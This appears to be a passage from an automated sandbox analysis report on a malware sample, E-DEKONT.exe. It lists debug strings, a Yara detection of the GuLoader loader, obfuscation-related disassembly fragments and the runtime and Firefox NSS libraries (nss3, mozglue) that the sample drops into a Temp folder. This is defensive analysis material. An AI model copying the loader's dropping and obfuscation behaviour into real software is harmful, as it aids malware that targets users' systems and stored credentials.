                  Source: Binary string: msvcp140.i386.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108954916729.000000001DAB8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
                  Source: Binary string: ucrtbase.pdbUGP source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108895399238.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
                  Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108884231351.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943979243.000000001E774000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108908823587.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108908941995.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944687963.000000001E79C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108892004613.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108891891978.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
                  Source: Binary string: vcruntime140.i386.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                  Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108909446480.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.4.dr
                  Source: Binary string: msvcp140.i386.pdbGCTL source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108954916729.000000001DAB8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
                  Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108887027855.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108886923210.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939672315.000000001E714000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944495518.000000001E78C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108913399205.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.4.dr

                  Data Obfuscation

                  barindex
                  Yara detected GuLoader
                  Source: Yara matchFile source: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000000.108599370042.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_10002DE0 push eax; ret 1_2_10002E0E
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B6496D push ecx; ret 1_2_02B64ACF
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B640BB push ecx; ret 1_2_02B6409A
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B640BB push esi; retf 1_2_02B6410B
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B692E3 push FFFFFFB9h; retf 1_2_02B692EA
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B64A56 push ecx; ret 1_2_02B64ACF
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B64A4D push ecx; ret 1_2_02B64ACF
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B63FAF push ecx; ret 1_2_02B6409A
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B6638C push ss; iretd 1_2_02B6638E
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B63FEC push ecx; ret 1_2_02B6409A
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B62321 push ds; ret 1_2_02B62323
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B61517 push esp; retf 1_2_02B61519
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_02B63D57 pushfd ; iretd 1_2_02B63D58
                  Source: msvcp140.dll.4.drStatic PE information: section name: .didat
                  Source: C:\Users\user\Desktop\E-DEKONT.exeCode function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_10001B18
                  Source: api-ms-win-core-console-l1-1-0.dll.4.drStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\mozglue.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\vcruntime140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\nssdbm3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\E-DEKONT.exeFile created: C:\Users\user\AppData\Local\Temp\75C649CD\nss3.dllJump to dropped file
